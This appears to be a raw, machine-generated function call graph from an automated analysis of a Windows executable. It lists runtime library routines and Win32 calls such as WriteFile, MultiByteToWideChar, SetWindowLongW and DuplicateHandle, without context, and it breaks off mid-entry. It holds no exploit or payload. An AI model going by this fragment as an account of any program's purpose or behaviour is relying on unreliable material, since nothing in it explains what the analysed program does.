11623 403e03 ___vcrt_freefls@4 20 API calls 11621->11623 11623->11618 11625 4051ac 11626 404831 __dosmaperr 20 API calls 11625->11626 11626->11621 11627 4051f5 11627->11621 11657 404dac 11627->11657 11628 4051c9 11628->11627 11629 403e03 ___vcrt_freefls@4 20 API calls 11628->11629 11629->11627 11632 40526d ___scrt_is_nonwritable_in_current_image 11631->11632 11633 404320 _com_raise_error 38 API calls 11632->11633 11635 405277 11633->11635 11636 4052fb ___scrt_is_nonwritable_in_current_image 11635->11636 11638 403e8b _abort 38 API calls 11635->11638 11639 403e03 ___vcrt_freefls@4 20 API calls 11635->11639 11660 405656 EnterCriticalSection 11635->11660 11661 4052f2 11635->11661 11636->11615 11638->11635 11639->11635 11665 403f2b 11640->11665 11643 404ef7 GetOEMCP 11645 404f20 11643->11645 11644 404f09 11644->11645 11646 404f0e GetACP 11644->11646 11645->11618 11645->11619 11646->11645 11648 404ed6 40 API calls 11647->11648 11649 405322 11648->11649 11652 405373 IsValidCodePage 11649->11652 11654 405329 11649->11654 11656 405398 ___scrt_get_show_window_mode 11649->11656 11650 4018cc _ValidateLocalCookies 5 API calls 11651 4051a4 11650->11651 11651->11625 11651->11628 11653 405385 GetCPInfo 11652->11653 11652->11654 11653->11654 11653->11656 11654->11650 11702 404fae GetCPInfo 11656->11702 11775 404d69 11657->11775 11659 404dd0 11659->11621 11660->11635 11664 40569e LeaveCriticalSection 11661->11664 11663 4052f9 11663->11635 11664->11663 11666 403f48 11665->11666 11672 403f3e 11665->11672 11667 404320 _com_raise_error 38 API calls 11666->11667 11666->11672 11668 403f69 11667->11668 11673 40723c 11668->11673 11672->11643 11672->11644 11674 403f82 11673->11674 11675 40724f 11673->11675 11677 407269 11674->11677 11675->11674 11681 4066bf 11675->11681 11678 407291 11677->11678 11679 40727c 11677->11679 11678->11672 11679->11678 11680 405261 __fassign 38 API calls 11679->11680 11680->11678 11682 4066cb ___scrt_is_nonwritable_in_current_image 11681->11682 11683 404320 _com_raise_error 38 API calls 11682->11683 11684 4066d4 11683->11684 11686 406722 ___scrt_is_nonwritable_in_current_image 11684->11686 11693 405656 EnterCriticalSection 11684->11693 11686->11674 11687 4066f2 11694 406736 11687->11694 11692 403e8b _abort 38 API calls 11692->11686 11693->11687 11695 406706 11694->11695 11696 406744 __fassign 11694->11696 11698 406725 11695->11698 11696->11695 11697 406472 __fassign 20 API calls 11696->11697 11697->11695 11701 40569e LeaveCriticalSection 11698->11701 11700 406719 11700->11686 11700->11692 11701->11700 11703 404fe8 11702->11703 11711 405092 11702->11711 11712 4062b8 11703->11712 11705 4018cc _ValidateLocalCookies 5 API calls 11708 40513e 11705->11708 11708->11654 11710 407aec 43 API calls 11710->11711 11711->11705 11713 403f2b __fassign 38 API calls 11712->11713 11714 4062d8 MultiByteToWideChar 11713->11714 11716 406316 11714->11716 11723 4063ae 11714->11723 11719 403e3d __onexit 21 API calls 11716->11719 11724 406337 __alloca_probe_16 ___scrt_get_show_window_mode 11716->11724 11717 4018cc _ValidateLocalCookies 5 API calls 11720 405049 11717->11720 11718 4063a8 11731 4063d5 11718->11731 11719->11724 11726 407aec 11720->11726 11722 40637c MultiByteToWideChar 11722->11718 11725 406398 GetStringTypeW 11722->11725 11723->11717 11724->11718 11724->11722 11725->11718 11727 403f2b __fassign 38 API calls 11726->11727 11728 407aff 11727->11728 11735 4078cf 11728->11735 11732 4063e1 11731->11732 11733 4063f2 11731->11733 11732->11733 11734 403e03 ___vcrt_freefls@4 20 API calls 11732->11734 11733->11723 11734->11733 11737 4078ea 11735->11737 11736 407910 MultiByteToWideChar 11738 407ac4 11736->11738 11739 40793a 11736->11739 11737->11736 11740 4018cc _ValidateLocalCookies 5 API calls 11738->11740 11744 403e3d __onexit 21 API calls 11739->11744 11746 40795b __alloca_probe_16 11739->11746 11741 40506a 11740->11741 11741->11710 11742 4079a4 MultiByteToWideChar 11743 407a10 11742->11743 11745 4079bd 11742->11745 11748 4063d5 __freea 20 API calls 11743->11748 11744->11746 11762 405989 11745->11762 11746->11742 11746->11743 11748->11738 11750 4079e7 11750->11743 11753 405989 11 API calls 11750->11753 11751 407a1f 11752 403e3d __onexit 21 API calls 11751->11752 11756 407a40 __alloca_probe_16 11751->11756 11752->11756 11753->11743 11754 407ab5 11755 4063d5 __freea 20 API calls 11754->11755 11755->11743 11756->11754 11757 405989 11 API calls 11756->11757 11758 407a94 11757->11758 11758->11754 11759 407aa3 WideCharToMultiByte 11758->11759 11759->11754 11760 407ae3 11759->11760 11761 4063d5 __freea 20 API calls 11760->11761 11761->11743 11763 4056b5 __dosmaperr 5 API calls 11762->11763 11764 4059b0 11763->11764 11767 4059b9 11764->11767 11770 405a11 11764->11770 11768 4018cc _ValidateLocalCookies 5 API calls 11767->11768 11769 405a0b 11768->11769 11769->11743 11769->11750 11769->11751 11771 4056b5 __dosmaperr 5 API calls 11770->11771 11772 405a38 11771->11772 11773 4018cc _ValidateLocalCookies 5 API calls 11772->11773 11774 4059f9 LCMapStringW 11773->11774 11774->11767 11776 404d75 ___scrt_is_nonwritable_in_current_image 11775->11776 11783 405656 EnterCriticalSection 11776->11783 11778 404d7f 11784 404dd4 11778->11784 11782 404d98 ___scrt_is_nonwritable_in_current_image 11782->11659 11783->11778 11796 4054f4 11784->11796 11786 404e22 11787 4054f4 26 API calls 11786->11787 11788 404e3e 11787->11788 11789 4054f4 26 API calls 11788->11789 11790 404e5c 11789->11790 11791 404d8c 11790->11791 11792 403e03 ___vcrt_freefls@4 20 API calls 11790->11792 11793 404da0 11791->11793 11792->11791 11810 40569e LeaveCriticalSection 11793->11810 11795 404daa 11795->11782 11797 405505 11796->11797 11806 405501 11796->11806 11798 40550c 11797->11798 11800 40551f ___scrt_get_show_window_mode 11797->11800 11799 404831 __dosmaperr 20 API calls 11798->11799 11801 405511 11799->11801 11803 405556 11800->11803 11804 40554d 11800->11804 11800->11806 11802 404639 _com_raise_error 26 API calls 11801->11802 11802->11806 11803->11806 11808 404831 __dosmaperr 20 API calls 11803->11808 11805 404831 __dosmaperr 20 API calls 11804->11805 11807 405552 11805->11807 11806->11786 11809 404639 _com_raise_error 26 API calls 11807->11809 11808->11807 11809->11806 11810->11795 12261 405f44 12262 405f50 ___scrt_is_nonwritable_in_current_image 12261->12262 12273 405656 EnterCriticalSection 12262->12273 12264 405f57 12274 405bff 12264->12274 12266 405f66 12272 405f75 12266->12272 12287 405dd8 GetStartupInfoW 12266->12287 12271 405f86 ___scrt_is_nonwritable_in_current_image 12298 405f91 12272->12298 12273->12264 12275 405c0b ___scrt_is_nonwritable_in_current_image 12274->12275 12276 405c18 12275->12276 12277 405c2f 12275->12277 12278 404831 __dosmaperr 20 API calls 12276->12278 12301 405656 EnterCriticalSection 12277->12301 12280 405c1d 12278->12280 12281 404639 _com_raise_error 26 API calls 12280->12281 12282 405c27 ___scrt_is_nonwritable_in_current_image 12281->12282 12282->12266 12283 405c67 12309 405c8e 12283->12309 12286 405c3b 12286->12283 12302 405b50 12286->12302 12288 405df5 12287->12288 12289 405e87 12287->12289 12288->12289 12290 405bff 27 API calls 12288->12290 12293 405e8e 12289->12293 12291 405e1e 12290->12291 12291->12289 12292 405e4c GetFileType 12291->12292 12292->12291 12294 405e95 12293->12294 12295 405ed8 GetStdHandle 12294->12295 12296 405f40 12294->12296 12297 405eeb GetFileType 12294->12297 12295->12294 12296->12272 12297->12294 12313 40569e LeaveCriticalSection 12298->12313 12300 405f98 12300->12271 12301->12286 12303 403ece __dosmaperr 20 API calls 12302->12303 12305 405b62 12303->12305 12304 405b6f 12306 403e03 ___vcrt_freefls@4 20 API calls 12304->12306 12305->12304 12308 405927 11 API calls 12305->12308 12307 405bc1 12306->12307 12307->12286 12308->12305 12312 40569e LeaveCriticalSection 12309->12312 12311 405c95 12311->12282 12312->12311 12313->12300 11811 401848 11814 402c47 11811->11814 11815 4043a4 __dosmaperr 20 API calls 11814->11815 11818 402c5e 11815->11818 11816 4018cc _ValidateLocalCookies 5 API calls 11817 401859 11816->11817 11818->11816 12102 403cc8 12103 403cd7 12102->12103 12107 403ceb 12102->12107 12105 403e03 ___vcrt_freefls@4 20 API calls 12103->12105 12103->12107 12104 403e03 ___vcrt_freefls@4 20 API calls 12106 403cfd 12104->12106 12105->12107 12108 403e03 ___vcrt_freefls@4 20 API calls 12106->12108 12107->12104 12109 403d10 12108->12109 12110 403e03 ___vcrt_freefls@4 20 API calls 12109->12110 12111 403d21 12110->12111 12112 403e03 ___vcrt_freefls@4 20 API calls 12111->12112 12113 403d32 12112->12113 12114 409cd3 12115 409ce9 12114->12115 12116 409cdd 12114->12116 12116->12115 12117 409ce2 CloseHandle 12116->12117 12117->12115 12118 4096d5 12119 4096fd 12118->12119 12120 409735 12119->12120 12121 409727 12119->12121 12122 40972e 12119->12122 12127 4097a7 12121->12127 12131 409790 12122->12131 12128 4097b0 12127->12128 12135 409e7f 12128->12135 12132 4097b0 12131->12132 12133 409e7f __startOneArgErrorHandling 21 API calls 12132->12133 12134 409733 12133->12134 12136 409ebe __startOneArgErrorHandling 12135->12136 12140 409f40 __startOneArgErrorHandling 12136->12140 12145 40a282 12136->12145 12138 409f6a 12139 40a596 __startOneArgErrorHandling 20 API calls 12138->12139 12141 409f76 12138->12141 12139->12141 12140->12138 12143 402e1b __startOneArgErrorHandling 5 API calls 12140->12143 12142 4018cc _ValidateLocalCookies 5 API calls 12141->12142 12144 40972c 12142->12144 12143->12138 12146 40a2a5 __raise_exc RaiseException 12145->12146 12147 40a2a0 12146->12147 12147->12140 12318 408f56 IsProcessorFeaturePresent 12366 4035d7 12367 403dc2 40 API calls 12366->12367 12368 4035df 12367->12368 11819 40185c 11820 401dd9 _abort GetModuleHandleW 11819->11820 11821 401864 11820->11821 11822 401870 11821->11822 11823 4036c9 _abort 28 API calls 11821->11823 11824 40187b ___scrt_is_nonwritable_in_current_image 11822->11824 11826 4036ab 11822->11826 11823->11822 11827 4034d8 _abort 28 API calls 11826->11827 11828 4036b6 11827->11828 11828->11824 11829 40485c 11830 40487c 11829->11830 11842 404892 11829->11842 11831 404831 __dosmaperr 20 API calls 11830->11831 11832 404881 11831->11832 11833 404639 _com_raise_error 26 API calls 11832->11833 11835 40488b 11833->11835 11838 4018cc _ValidateLocalCookies 5 API calls 11835->11838 11837 40497e 11839 403e03 ___vcrt_freefls@4 20 API calls 11837->11839 11840 404a18 11838->11840 11841 404a00 11839->11841 11864 404c7d 11841->11864 11842->11841 11843 404907 11842->11843 11849 404a29 11842->11849 11858 40311e 11843->11858 11845 404975 11845->11837 11846 404a1c 11845->11846 11847 404649 _com_raise_error 11 API calls 11846->11847 11848 404a28 11847->11848 11850 404a39 11849->11850 11850->11850 11851 403ece __dosmaperr 20 API calls 11850->11851 11852 404a6b 11851->11852 11853 404649 _com_raise_error 11 API calls 11852->11853 11854 404ac6 ___scrt_get_show_window_mode 11853->11854 11855 404b88 FindFirstFileExW 11854->11855 11856 404bd7 11855->11856 11857 404a29 26 API calls 11856->11857 11859 403133 11858->11859 11860 40312f 11858->11860 11859->11860 11861 403ece __dosmaperr 20 API calls 11859->11861 11860->11845 11862 403161 11861->11862 11863 403e03 ___vcrt_freefls@4 20 API calls 11862->11863 11863->11860 11865 404c87 11864->11865 11866 404c97 11865->11866 11867 403e03 ___vcrt_freefls@4 20 API calls 11865->11867 11868 403e03 ___vcrt_freefls@4 20 API calls 11866->11868 11867->11865 11869 404c9e 11868->11869 11869->11835 12148 4074e0 12150 407519 12148->12150 12149 40751d 12151 404831 __dosmaperr 20 API calls 12149->12151 12150->12149 12161 407545 12150->12161 12152 407522 12151->12152 12154 404639 _com_raise_error 26 API calls 12152->12154 12153 407869 12155 4018cc _ValidateLocalCookies 5 API calls 12153->12155 12156 40752d 12154->12156 12157 407876 12155->12157 12158 4018cc _ValidateLocalCookies 5 API calls 12156->12158 12159 407539 12158->12159 12161->12153 12162 407400 12161->12162 12165 40741b 12162->12165 12163 4018cc _ValidateLocalCookies 5 API calls 12164 407492 12163->12164 12164->12161 12165->12163 12166 4046e0 12170 4046f1 12166->12170 12167 4046f5 12168 4046fa 12167->12168 12169 404831 __dosmaperr 20 API calls 12167->12169 12171 404725 12169->12171 12170->12167 12170->12168 12173 404736 12170->12173 12172 404639 _com_raise_error 26 API calls 12171->12172 12172->12168 12173->12168 12174 404831 __dosmaperr 20 API calls 12173->12174 12174->12171 12319 a8bb8a 12320 a8bbc6 PostMessageW 12319->12320 12322 a8bc10 12320->12322 11870 a8b080 11871 a8b0a2 SetConsoleCtrlHandler 11870->11871 11873 a8b128 11871->11873 11421 a8bb06 11422 a8bb7c 11421->11422 11423 a8bb44 CreateIconFromResourceEx 11421->11423 11422->11423 11424 a8bb52 11423->11424 12373 403dee 12374 403df1 12373->12374 12375 403e8b _abort 38 API calls 12374->12375 12376 403dfd 12375->12376 12377 403e37 __dosmaperr 12376->12377 12378 403e0e HeapFree 12376->12378 12378->12377 12379 403e23 12378->12379 12380 404831 __dosmaperr 20 API calls 12379->12380 12381 403e29 GetLastError 12380->12381 12381->12377 12323 40276f 12324 402786 12323->12324 12325 402779 12323->12325 12325->12324 12326 403e03 ___vcrt_freefls@4 20 API calls 12325->12326 12326->12324 12175 4022f0 12186 4022b0 12175->12186 12187 4022c2 12186->12187 12188 4022cf 12186->12188 12189 4018cc _ValidateLocalCookies 5 API calls 12187->12189 12189->12188 12327 408f70 12330 408f8e 12327->12330 12329 408f86 12334 408f93 12330->12334 12331 4097e3 21 API calls 12332 4091bf 12331->12332 12332->12329 12333 409028 12333->12329 12334->12331 12334->12333 12190 408af1 12191 408b11 12190->12191 12194 408b48 12191->12194 12193 408b3b 12195 408b4f 12194->12195 12196 408bb0 12195->12196 12200 408b6f 12195->12200 12197 4097a7 21 API calls 12196->12197 12198 40969e 12196->12198 12199 408bfe 12197->12199 12198->12193 12199->12193 12200->12198 12201 4097a7 21 API calls 12200->12201 12202 4096ce 12201->12202 12202->12193 12335 a8a59b 12336 a8a5c2 DuplicateHandle 12335->12336 12338 a8a60e 12336->12338 12386 a8b51b 12387 a8b572 GetClassInfoW 12386->12387 12389 a8b5c9 12387->12389 12339 405575 GetCommandLineA GetCommandLineW 12340 403775 12341 403781 ___scrt_is_nonwritable_in_current_image 12340->12341 12342 4037b8 ___scrt_is_nonwritable_in_current_image 12341->12342 12348 405656 EnterCriticalSection 12341->12348 12344 403795 12345 406736 __fassign 20 API calls 12344->12345 12346 4037a5 12345->12346 12349 4037be 12346->12349 12348->12344 12352 40569e LeaveCriticalSection 12349->12352 12351 4037c5 12351->12342 12352->12351 11874 402e79 11875 402ea4 GetModuleFileNameW 11874->11875 11876 402e88 11874->11876 11881 402eca 11875->11881 11876->11875 11877 402e8e 11876->11877 11878 404831 __dosmaperr 20 API calls 11877->11878 11879 402e93 11878->11879 11880 404639 _com_raise_error 26 API calls 11879->11880 11882 402e9d 11880->11882 11883 40311e 20 API calls 11881->11883 11884 402ef4 11883->11884 11885 402efd 11884->11885 11888 402f09 11884->11888 11886 404831 __dosmaperr 20 API calls 11885->11886 11887 402f02 11886->11887 11889 403e03 ___vcrt_freefls@4 20 API calls 11887->11889 11888->11887 11890 403e03 ___vcrt_freefls@4 20 API calls 11888->11890 11889->11882 11890->11887 11891 403c7a 11894 4033a2 11891->11894 11903 4032fb 11894->11903 11897 4032fb 5 API calls 11898 4033c0 11897->11898 11899 4032cc 20 API calls 11898->11899 11900 4033cb 11899->11900 11901 4032cc 20 API calls 11900->11901 11902 4033d6 11901->11902 11904 403314 11903->11904 11905 4018cc _ValidateLocalCookies 5 API calls 11904->11905 11906 403335 11905->11906 11906->11897 12390 4099fb 12391 409a14 __startOneArgErrorHandling 12390->12391 12392 409a3d __startOneArgErrorHandling 12391->12392 12393 409fd4 21 API calls 12391->12393 12393->12392 12394 4067fe GetProcessHeap 11429 40317f 11438 4055c5 GetEnvironmentStringsW 11429->11438 11433 403e03 ___vcrt_freefls@4 20 API calls 11434 4031cc 11433->11434 11435 4031a2 11436 403e03 ___vcrt_freefls@4 20 API calls 11435->11436 11437 403197 11436->11437 11437->11433 11439 403191 11438->11439 11440 4055d9 11438->11440 11439->11437 11445 4031d2 11439->11445 11462 403e3d 11440->11462 11442 4055ed 11443 403e03 ___vcrt_freefls@4 20 API calls 11442->11443 11444 405607 FreeEnvironmentStringsW 11443->11444 11444->11439 11448 4031f0 11445->11448 11446 403ece __dosmaperr 20 API calls 11447 40322a 11446->11447 11449 40329b 11447->11449 11452 403ece __dosmaperr 20 API calls 11447->11452 11453 40329d 11447->11453 11457 4032bf 11447->11457 11460 403e03 ___vcrt_freefls@4 20 API calls 11447->11460 11469 40467c 11447->11469 11448->11446 11448->11448 11450 403e03 ___vcrt_freefls@4 20 API calls 11449->11450 11451 4032b5 11450->11451 11451->11435 11452->11447 11478 4032cc 11453->11478 11459 404649 _com_raise_error 11 API calls 11457->11459 11458 403e03 ___vcrt_freefls@4 20 API calls 11458->11449 11461 4032cb 11459->11461 11460->11447 11463 403e7b 11462->11463 11467 403e4b __dosmaperr 11462->11467 11464 404831 __dosmaperr 20 API calls 11463->11464 11466 403e79 11464->11466 11465 403e66 RtlAllocateHeap 11465->11466 11465->11467 11466->11442 11467->11463 11467->11465 11468 4068fd __dosmaperr 7 API calls 11467->11468 11468->11467 11470 404689 11469->11470 11471 404697 11469->11471 11470->11471 11474 4046b0 11470->11474 11472 404831 __dosmaperr 20 API calls 11471->11472 11477 4046a1 11472->11477 11473 404639 _com_raise_error 26 API calls 11475 4046ab 11473->11475 11474->11475 11476 404831 __dosmaperr 20 API calls 11474->11476 11475->11447 11476->11477 11477->11473 11479 4032a3 11478->11479 11480 4032d9 11478->11480 11479->11458 11481 4032f0 11480->11481 11483 403e03 ___vcrt_freefls@4 20 API calls 11480->11483 11482 403e03 ___vcrt_freefls@4 20 API calls 11481->11482 11482->11479 11483->11480 11907 408c01 11908 408c25 11907->11908 11909 408c3e 11908->11909 11911 4099fb __startOneArgErrorHandling 11908->11911 11912 408c88 11909->11912 11915 4097e3 11909->11915 11914 409a3d __startOneArgErrorHandling 11911->11914 11925 409fd4 11911->11925 11916 409800 DecodePointer 11915->11916 11917 409810 11915->11917 11916->11917 11919 40989d 11917->11919 11922 409892 11917->11922 11923 409847 11917->11923 11918 4018cc _ValidateLocalCookies 5 API calls 11920 4099f7 11918->11920 11921 404831 __dosmaperr 20 API calls 11919->11921 11919->11922 11920->11912 11921->11922 11922->11918 11923->11922 11924 404831 __dosmaperr 20 API calls 11923->11924 11924->11922 11926 40a00d __startOneArgErrorHandling 11925->11926 11928 40a034 __startOneArgErrorHandling 11926->11928 11936 40a2a5 11926->11936 11929 40a077 11928->11929 11930 40a052 11928->11930 11949 40a596 11929->11949 11940 40a5c5 11930->11940 11933 40a072 __startOneArgErrorHandling 11934 4018cc _ValidateLocalCookies 5 API calls 11933->11934 11935 40a09b 11934->11935 11935->11914 11937 40a2d0 __raise_exc 11936->11937 11938 40a4c9 RaiseException 11937->11938 11939 40a4e1 11938->11939 11939->11928 11941 40a5d4 11940->11941 11942 40a5f3 __startOneArgErrorHandling 11941->11942 11943 40a648 __startOneArgErrorHandling 11941->11943 11956 402e1b 11942->11956 11945 40a596 __startOneArgErrorHandling 20 API calls 11943->11945 11948 40a641 11945->11948 11947 40a596 __startOneArgErrorHandling 20 API calls 11947->11948 11948->11933 11950 40a5a3 11949->11950 11951 40a5b8 11949->11951 11953 40a5bd 11950->11953 11954 404831 __dosmaperr 20 API calls 11950->11954 11952 404831 __dosmaperr 20 API calls 11951->11952 11952->11953 11953->11933 11955 40a5b0 11954->11955 11955->11933 11959 402e43 11956->11959 11957 4018cc _ValidateLocalCookies 5 API calls 11958 402e60 11957->11958 11958->11947 11958->11948 11959->11957 10787 a8a96a 10788 a8a99c SetWindowLongW 10787->10788 10789 a8a9c7 10787->10789 10790 a8a9b1 10788->10790 10789->10788 12203 4c70205 12206 4c7023e DispatchMessageW 12203->12206 12205 4c7027f 12206->12205 12395 407384 12405 407dbe 12395->12405 12399 407391 12418 40809a 12399->12418 12402 4073bb 12403 403e03 ___vcrt_freefls@4 20 API calls 12402->12403 12404 4073c6 12403->12404 12422 407dc7 12405->12422 12407 40738c 12408 407ffa 12407->12408 12409 408006 ___scrt_is_nonwritable_in_current_image 12408->12409 12442 405656 EnterCriticalSection 12409->12442 12411 40807c 12456 408091 12411->12456 12413 408011 12413->12411 12415 408050 DeleteCriticalSection 12413->12415 12443 408e2c 12413->12443 12414 408088 ___scrt_is_nonwritable_in_current_image 12414->12399 12417 403e03 ___vcrt_freefls@4 20 API calls 12415->12417 12417->12413 12419 4080b0 12418->12419 12421 4073a0 DeleteCriticalSection 12418->12421 12420 403e03 ___vcrt_freefls@4 20 API calls 12419->12420 12419->12421 12420->12421 12421->12399 12421->12402 12423 407dd3 ___scrt_is_nonwritable_in_current_image 12422->12423 12432 405656 EnterCriticalSection 12423->12432 12425 407e76 12437 407e96 12425->12437 12428 407e82 ___scrt_is_nonwritable_in_current_image 12428->12407 12430 407d77 66 API calls 12431 407de2 12430->12431 12431->12425 12431->12430 12433 4073d0 EnterCriticalSection 12431->12433 12434 407e6c 12431->12434 12432->12431 12433->12431 12440 4073e4 LeaveCriticalSection 12434->12440 12436 407e74 12436->12431 12441 40569e LeaveCriticalSection 12437->12441 12439 407e9d 12439->12428 12440->12436 12441->12439 12442->12413 12444 408e38 ___scrt_is_nonwritable_in_current_image 12443->12444 12445 408e49 12444->12445 12446 408e5e 12444->12446 12447 404831 __dosmaperr 20 API calls 12445->12447 12455 408e59 ___scrt_is_nonwritable_in_current_image 12446->12455 12459 4073d0 EnterCriticalSection 12446->12459 12448 408e4e 12447->12448 12450 404639 _com_raise_error 26 API calls 12448->12450 12450->12455 12451 408e7a 12460 408db6 12451->12460 12453 408e85 12476 408ea2 12453->12476 12455->12413 12724 40569e LeaveCriticalSection 12456->12724 12458 408098 12458->12414 12459->12451 12461 408dc3 12460->12461 12462 408dd8 12460->12462 12463 404831 __dosmaperr 20 API calls 12461->12463 12468 408dd3 12462->12468 12479 407d11 12462->12479 12465 408dc8 12463->12465 12466 404639 _com_raise_error 26 API calls 12465->12466 12466->12468 12468->12453 12469 40809a 20 API calls 12470 408df4 12469->12470 12485 407296 12470->12485 12472 408dfa 12492 409b5e 12472->12492 12475 403e03 ___vcrt_freefls@4 20 API calls 12475->12468 12723 4073e4 LeaveCriticalSection 12476->12723 12478 408eaa 12478->12455 12480 407d25 12479->12480 12481 407d29 12479->12481 12480->12469 12481->12480 12482 407296 26 API calls 12481->12482 12483 407d49 12482->12483 12507 4087b3 12483->12507 12486 4072a2 12485->12486 12487 4072b7 12485->12487 12488 404831 __dosmaperr 20 API calls 12486->12488 12487->12472 12489 4072a7 12488->12489 12490 404639 _com_raise_error 26 API calls 12489->12490 12491 4072b2 12490->12491 12491->12472 12493 409b82 12492->12493 12494 409b6d 12492->12494 12496 409bbd 12493->12496 12499 409ba9 12493->12499 12495 40481e __dosmaperr 20 API calls 12494->12495 12498 409b72 12495->12498 12497 40481e __dosmaperr 20 API calls 12496->12497 12500 409bc2 12497->12500 12501 404831 __dosmaperr 20 API calls 12498->12501 12680 409b36 12499->12680 12503 404831 __dosmaperr 20 API calls 12500->12503 12504 408e00 12501->12504 12505 409bca 12503->12505 12504->12468 12504->12475 12506 404639 _com_raise_error 26 API calls 12505->12506 12506->12504 12508 4087bf ___scrt_is_nonwritable_in_current_image 12507->12508 12509 4087c7 12508->12509 12510 4087df 12508->12510 12532 40481e 12509->12532 12512 40887d 12510->12512 12516 408814 12510->12516 12514 40481e __dosmaperr 20 API calls 12512->12514 12517 408882 12514->12517 12515 404831 __dosmaperr 20 API calls 12528 4087d4 ___scrt_is_nonwritable_in_current_image 12515->12528 12535 405c97 EnterCriticalSection 12516->12535 12519 404831 __dosmaperr 20 API calls 12517->12519 12521 40888a 12519->12521 12520 40881a 12522 408836 12520->12522 12523 40884b 12520->12523 12524 404639 _com_raise_error 26 API calls 12521->12524 12525 404831 __dosmaperr 20 API calls 12522->12525 12536 40889e 12523->12536 12524->12528 12527 40883b 12525->12527 12530 40481e __dosmaperr 20 API calls 12527->12530 12528->12480 12529 408846 12587 408875 12529->12587 12530->12529 12533 4043a4 __dosmaperr 20 API calls 12532->12533 12534 404823 12533->12534 12534->12515 12535->12520 12537 4088cc 12536->12537 12575 4088c5 12536->12575 12538 4088d0 12537->12538 12539 4088ef 12537->12539 12541 40481e __dosmaperr 20 API calls 12538->12541 12542 408940 12539->12542 12543 408923 12539->12543 12540 4018cc _ValidateLocalCookies 5 API calls 12544 408aa6 12540->12544 12545 4088d5 12541->12545 12547 408956 12542->12547 12590 408d9b 12542->12590 12546 40481e __dosmaperr 20 API calls 12543->12546 12544->12529 12548 404831 __dosmaperr 20 API calls 12545->12548 12550 408928 12546->12550 12593 408443 12547->12593 12552 4088dc 12548->12552 12555 404831 __dosmaperr 20 API calls 12550->12555 12553 404639 _com_raise_error 26 API calls 12552->12553 12553->12575 12558 408930 12555->12558 12556 408964 12559 408968 12556->12559 12560 40898a 12556->12560 12557 40899d 12562 4089b1 12557->12562 12563 4089f7 WriteFile 12557->12563 12561 404639 _com_raise_error 26 API calls 12558->12561 12564 408a5e 12559->12564 12600 4083d6 12559->12600 12605 408223 GetConsoleCP 12560->12605 12561->12575 12567 4089e7 12562->12567 12568 4089b9 12562->12568 12566 408a1a GetLastError 12563->12566 12573 408980 12563->12573 12564->12575 12576 404831 __dosmaperr 20 API calls 12564->12576 12566->12573 12631 4084b9 12567->12631 12569 4089d7 12568->12569 12570 4089be 12568->12570 12623 408686 12569->12623 12570->12564 12616 408598 12570->12616 12573->12564 12573->12575 12579 408a3a 12573->12579 12575->12540 12578 408a83 12576->12578 12582 40481e __dosmaperr 20 API calls 12578->12582 12580 408a41 12579->12580 12581 408a55 12579->12581 12583 404831 __dosmaperr 20 API calls 12580->12583 12638 4047fb 12581->12638 12582->12575 12585 408a46 12583->12585 12586 40481e __dosmaperr 20 API calls 12585->12586 12586->12575 12679 405cba LeaveCriticalSection 12587->12679 12589 40887b 12589->12528 12643 408d1d 12590->12643 12665 407cbb 12593->12665 12595 408453 12596 408458 12595->12596 12597 404320 _com_raise_error 38 API calls 12595->12597 12596->12556 12596->12557 12598 40847b 12597->12598 12598->12596 12599 408499 GetConsoleMode 12598->12599 12599->12596 12603 408430 12600->12603 12604 4083fb 12600->12604 12601 408432 GetLastError 12601->12603 12602 408f11 WriteConsoleW CreateFileW 12602->12604 12603->12573 12604->12601 12604->12602 12604->12603 12610 408286 12605->12610 12615 408398 12605->12615 12606 4018cc _ValidateLocalCookies 5 API calls 12608 4083d2 12606->12608 12608->12573 12609 407222 40 API calls __fassign 12609->12610 12610->12609 12611 40830c WideCharToMultiByte 12610->12611 12614 408363 WriteFile 12610->12614 12610->12615 12674 405fc6 12610->12674 12612 408332 WriteFile 12611->12612 12611->12615 12612->12610 12613 4083bb GetLastError 12612->12613 12613->12615 12614->12610 12614->12613 12615->12606 12617 4085a7 12616->12617 12618 408669 12617->12618 12620 408625 WriteFile 12617->12620 12619 4018cc _ValidateLocalCookies 5 API calls 12618->12619 12621 408682 12619->12621 12620->12617 12622 40866b GetLastError 12620->12622 12621->12573 12622->12618 12626 408695 12623->12626 12624 4087a0 12625 4018cc _ValidateLocalCookies 5 API calls 12624->12625 12627 4087af 12625->12627 12626->12624 12628 408717 WideCharToMultiByte 12626->12628 12630 40874c WriteFile 12626->12630 12627->12573 12629 408798 GetLastError 12628->12629 12628->12630 12629->12624 12630->12626 12630->12629 12632 4084c8 12631->12632 12633 40857b 12632->12633 12635 40853a WriteFile 12632->12635 12634 4018cc _ValidateLocalCookies 5 API calls 12633->12634 12636 408594 12634->12636 12635->12632 12637 40857d GetLastError 12635->12637 12636->12573 12637->12633 12639 40481e __dosmaperr 20 API calls 12638->12639 12640 404806 __dosmaperr 12639->12640 12641 404831 __dosmaperr 20 API calls 12640->12641 12642 404819 12641->12642 12642->12575 12652 405d6e 12643->12652 12645 408d2f 12646 408d37 12645->12646 12647 408d48 SetFilePointerEx 12645->12647 12650 404831 __dosmaperr 20 API calls 12646->12650 12648 408d60 GetLastError 12647->12648 12649 408d3c 12647->12649 12651 4047fb __dosmaperr 20 API calls 12648->12651 12649->12547 12650->12649 12651->12649 12653 405d90 12652->12653 12654 405d7b 12652->12654 12656 40481e __dosmaperr 20 API calls 12653->12656 12658 405db5 12653->12658 12655 40481e __dosmaperr 20 API calls 12654->12655 12657 405d80 12655->12657 12659 405dc0 12656->12659 12660 404831 __dosmaperr 20 API calls 12657->12660 12658->12645 12661 404831 __dosmaperr 20 API calls 12659->12661 12662 405d88 12660->12662 12663 405dc8 12661->12663 12662->12645 12664 404639 _com_raise_error 26 API calls 12663->12664 12664->12662 12666 407cd5 12665->12666 12667 407cc8 12665->12667 12670 407ce1 12666->12670 12671 404831 __dosmaperr 20 API calls 12666->12671 12668 404831 __dosmaperr 20 API calls 12667->12668 12669 407ccd 12668->12669 12669->12595 12670->12595 12672 407d02 12671->12672 12673 404639 _com_raise_error 26 API calls 12672->12673 12673->12669 12675 404320 _com_raise_error 38 API calls 12674->12675 12676 405fd1 12675->12676 12677 40723c __fassign 38 API calls 12676->12677 12678 405fe1 12677->12678 12678->12610 12679->12589 12683 409ab4 12680->12683 12682 409b5a 12682->12504 12684 409ac0 ___scrt_is_nonwritable_in_current_image 12683->12684 12694 405c97 EnterCriticalSection 12684->12694 12686 409ace 12687 409b00 12686->12687 12688 409af5 12686->12688 12690 404831 __dosmaperr 20 API calls 12687->12690 12695 409bdd 12688->12695 12691 409afb 12690->12691 12710 409b2a 12691->12710 12693 409b1d 